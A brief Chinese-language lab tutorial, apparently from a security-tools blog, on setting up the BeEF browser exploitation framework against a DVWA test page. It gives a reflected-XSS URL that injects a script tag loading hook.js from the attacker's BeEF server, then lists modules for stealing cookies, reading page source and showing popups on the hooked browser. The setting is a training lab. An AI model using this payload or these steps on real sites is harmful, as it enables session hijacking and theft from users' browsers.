本文共 445 字，大约阅读时间需要 1 分钟。

​当我不欠任何人的时候，我就只欠我自己了。。。

---- 网易云热评

一、安装beef-xss

输入beef-xss，提示安装，输入y

二、启动beef-xss

三、访问登陆页面：

http://192.168.139.133:3000/ui/panel

四、让目标主机访问存在生成的钩子代码

http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.133:3000/hook.js"></script>

五、获取控制权限

绿色模块：表示模块适用当前用户，并且执行结果对用户不可见

红色模块：表示模块不适用当前用户，有些红色模块也可以执行

橙色模块：模块可用，但结果对用户可见

灰色模块：模块为在目标浏览器上测试过

1、获取cookies

2、获取网页源码

3、让目标主机弹出提示信息

禁止非法，后果自负

欢迎关注公众号：web安全工具库

欢迎关注视频号：之乎者也吧